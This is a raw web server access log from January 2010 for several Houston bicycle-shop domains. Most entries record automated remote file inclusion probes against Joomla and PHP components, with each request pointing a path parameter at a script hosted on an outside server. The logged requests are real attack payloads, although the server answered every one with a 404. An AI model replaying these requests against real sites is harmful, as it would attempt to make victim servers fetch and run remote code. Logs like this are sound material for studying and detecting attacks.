174.120.14.42 - - [10/Jan/2010:11:23:45 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:23:45 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:23:45 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:23:50 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:23:50 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:23:50 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:28:28 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:28:51 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://virtualgryphon.info/wp-includes/lolid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:34:22 -0800] "GET /components/com_virtuemart/show_image_in_Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:34:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:34:23 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.8.75.157 - - [10/Jan/2010:11:38:54 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "bicyclestoreshouston.com"
194.8.75.157 - - [10/Jan/2010:11:38:55 -0800] "GET / HTTP/1.0" 200 1748 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "bicyclestoreshouston.com"
194.8.75.157 - - [10/Jan/2010:11:38:55 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:11:41:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:13 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:14 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:15 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:20 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:20 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:20 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:26 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:11:41:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:43:13 -0800] "GET /components/com_virtuemart/show_image_in_Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:43:13 -0800] "GET /logs//components/com_virtuemart/show_image_in_Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:11:43:13 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_Imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:11:43:42 -0800] "GET /logs/access.log//errors.php?error=http://www.telco.ie/sohoadmin/fork.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:11:43:43 -0800] "GET /logs//errors.php?error=http://www.telco.ie/sohoadmin/fork.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
122.200.203.11 - - [10/Jan/2010:11:43:43 -0800] "GET /errors.php?error=http://www.telco.ie/sohoadmin/fork.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:43:58 -0800] "GET /skin/zero_vote/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:44:03 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.14.42 - - [10/Jan/2010:11:44:03 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.anabolex.com/gallery/uploads/34972/RippeR/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
194.8.75.157 - - [10/Jan/2010:11:44:14 -0800] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/0.6 Beta (Windows)" "www.svbikes.com"
194.8.75.157 - - [10/Jan/2010:11:44:14 -0800] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/0.6 Beta (Windows)" "www.svbikes.com"
194.8.75.157 - - [10/Jan/2010:11:44:15 -0800] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/0.6 Beta (Windows)" "www.svbikes.com"
67.195.111.183 - - [10/Jan/2010:12:07:08 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.111.183 - - [10/Jan/2010:12:07:09 -0800] "GET /?D=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
207.191.225.96 - - [10/Jan/2010:12:08:12 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:12:08:15 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:12:08:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:12:09:34 -0800] "GET /administrator/components/com_virtuemart/configuration.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:12:09:34 -0800] "GET /logs/administrator/components/com_virtuemart/configuration.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:12:09:37 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/configuration.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:12:10:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:12:10:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:12:10:32 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.94.62 - - [10/Jan/2010:12:12:37 -0800] "GET /agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:37 -0800] "GET /logs/scripts.log%20%20//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:37 -0800] "GET /logs/scripts.log%20%20//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:37 -0800] "GET /logs//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:38 -0800] "GET /logs/scripts.log//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:38 -0800] "GET /agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:38 -0800] "GET /agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:39 -0800] "GET /logs/scripts.log//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:39 -0800] "GET /agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:39 -0800] "GET /logs//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:39 -0800] "GET /logs//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.0.94.62 - - [10/Jan/2010:12:12:39 -0800] "GET /logs//agenda.php3?rootagenda=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
207.191.225.96 - - [10/Jan/2010:12:14:31 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
207.191.225.96 - - [10/Jan/2010:12:15:12 -0800] "GET /logs/access.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:12:18:35 -0800] "GET /administrator/components/com_virtuemart/configuration.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:12:18:35 -0800] "GET /logs/administrator/components/com_virtuemart/configuration.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.168.150.158 - - [10/Jan/2010:12:18:35 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/configuration.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:20:20 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:20:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:20:21 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
209.34.196.83 - - [10/Jan/2010:12:23:58 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
209.34.196.83 - - [10/Jan/2010:12:23:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
209.34.196.83 - - [10/Jan/2010:12:23:58 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:24:09 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:24:09 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:24:09 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:12:28:02 -0800] "GET /translations/Korean.txt HTTP/1.0" 200 32652 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:28:27 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:28:27 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:28:27 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:37:17 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:37:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
193.19.177.19 - - [10/Jan/2010:12:37:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "houstonbikeshop.com"
190.53.37.10 - - [10/Jan/2010:12:39:25 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.53.37.10 - - [10/Jan/2010:12:39:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.53.37.10 - - [10/Jan/2010:12:39:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.js2023.pl/images/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:12:41:37 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:12:41:37 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:12:41:37 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.10.138.235 - - [10/Jan/2010:12:42:16 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.10.138.235 - - [10/Jan/2010:12:42:17 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.10.138.235 - - [10/Jan/2010:12:42:17 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
217.10.138.235 - - [10/Jan/2010:12:44:32 -0800] "GET /logs/access.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.37.114 - - [10/Jan/2010:12:44:53 -0800] "GET /?M=D HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
174.120.144.170 - - [10/Jan/2010:12:46:30 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.yuiworld.kr//bbs//icon/new.jpg? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:12:52:05 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:12:52:05 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "houstonbikeshop.com"
74.55.15.194 - - [10/Jan/2010:12:52:05 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "houstonbikeshop.com"
59.151.9.122 - - [10/Jan/2010:12:55:52 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
59.151.9.122 - - [10/Jan/2010:12:55:52 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
59.151.9.122 - - [10/Jan/2010:12:55:52 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "houstonbikeshop.com"
114.255.172.96 - - [10/Jan/2010:12:57:58 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "houstonbikeshop.com"
114.255.172.96 - - [10/Jan/2010:12:57:58 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://109.cypanel.com/_vti_txt/id1.php? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "houstonbikeshop.com"
75.148.146.78 - - [10/Jan/2010:13:00:38 -0800] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/profile/1742501?searchterm=Houston,%20TX%2077024,%20USA" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.svbikes.com"
